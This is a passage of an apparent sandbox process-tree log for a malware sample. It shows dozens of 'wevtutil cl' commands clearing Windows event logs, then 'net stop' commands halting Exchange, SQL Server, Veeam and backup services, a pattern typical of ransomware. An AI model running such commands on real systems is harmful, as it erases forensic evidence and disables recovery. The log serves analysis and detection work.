    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
    3⤵
    PID:3044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
    3⤵
    PID:4380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
    3⤵
    PID:4556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
    3⤵
    PID:1748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:4244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
    3⤵
    PID:1128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
    3⤵
    PID:2104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:3688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:2800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:4080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    3⤵
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:3928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
    3⤵
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:4552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Call"
    3⤵
    PID:748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
    3⤵
    PID:4196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
    3⤵
    PID:3616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
    3⤵
    PID:652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:2492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
    3⤵
    PID:3260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"
    3⤵
    PID:2876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
    3⤵
    PID:3256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
    3⤵
    PID:368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:4092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:3740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:4696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
    3⤵
    PID:2292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
    3⤵
    PID:1208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
    3⤵
    PID:4856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
    3⤵
    PID:2064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
    3⤵
    PID:3680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
    3⤵
    PID:3160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
    3⤵
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
    3⤵
    PID:4624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:2976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
    3⤵
    PID:3304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
    3⤵
    PID:2304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
    3⤵
    PID:4280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
    3⤵
    PID:1432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
    3⤵
    PID:4872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
    3⤵
    PID:356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
    3⤵
    PID:4340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
    3⤵
    PID:4056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
    3⤵
    PID:3456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
    3⤵
    PID:3468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
    3⤵
    PID:4060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
    3⤵
    PID:4876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
    3⤵
    PID:520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
    3⤵
    PID:4048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:4908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:2380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:4360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
    3⤵
    PID:5076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
    3⤵
    PID:1056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
    3⤵
    PID:3132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:4536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:4928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
    3⤵
    PID:3620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
    3⤵
    PID:4844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
    3⤵
    PID:1844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
    3⤵
    PID:1912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
    3⤵
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
    3⤵
    PID:2276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
    3⤵
    PID:3008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
    3⤵
    PID:4476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
    3⤵
    PID:4380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
    3⤵
    PID:4556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
    3⤵
    PID:1748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:4244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:1128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
    3⤵
    PID:2104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:2520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
    3⤵
    PID:3928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:4552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:4196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:4792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:2492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:3672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
  2⤵
  PID:780
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSA"
    3⤵
    PID:1200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSA"
      4⤵
      PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
  2⤵
  PID:3052
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSRS"
    3⤵
    PID:1368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSRS"
      4⤵
      PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
  2⤵
  PID:4328
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SQL_2008"
    3⤵
    PID:520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
      4⤵
      PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
  2⤵
  PID:1012
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
  2⤵
  PID:4840
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPS"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPS"
      4⤵
      PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
  2⤵
  PID:1580
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPSAMA"
    3⤵
    PID:1348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
      4⤵
      PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
  2⤵
  PID:4360
- - C:\Windows\system32\net.exe
    net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:2368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
      4⤵
      PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
  2⤵
  PID:2156
- - C:\Windows\system32\net.exe
    net stop "MSSQL$ECWDB2"
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
      4⤵
      PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
  2⤵
  PID:4332
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
  2⤵
  PID:1316
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
  2⤵
  PID:484
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:4320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
  2⤵
  PID:2120
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:1716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
      4⤵
      PID:608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
  2⤵
  PID:3688
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:2740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
      4⤵
      PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
  2⤵
  PID:3928
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPS"
    3⤵
    PID:4448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPS"
      4⤵
      PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
  2⤵
  PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
  2⤵
  PID:5024
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:3264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
  2⤵
  PID:4752
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher"
    3⤵
    PID:1800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher"
      4⤵
      PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
  2⤵
  PID:4140
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:1196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
  2⤵
  PID:2292
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:3952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
  2⤵
  PID:268
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:1208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
  2⤵
  PID:1124
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:1320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
  2⤵
  PID:2304
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:2864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
  2⤵
  PID:1252
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:2300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
  2⤵
  PID:3304
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:3728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
  2⤵
  PID:1236
- - C:\Windows\system32\net.exe
    net stop "MSSQLSERVER"
    3⤵
    PID:836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLSERVER"
      4⤵
      PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
  2⤵
  PID:4924
- - C:\Windows\system32\net.exe
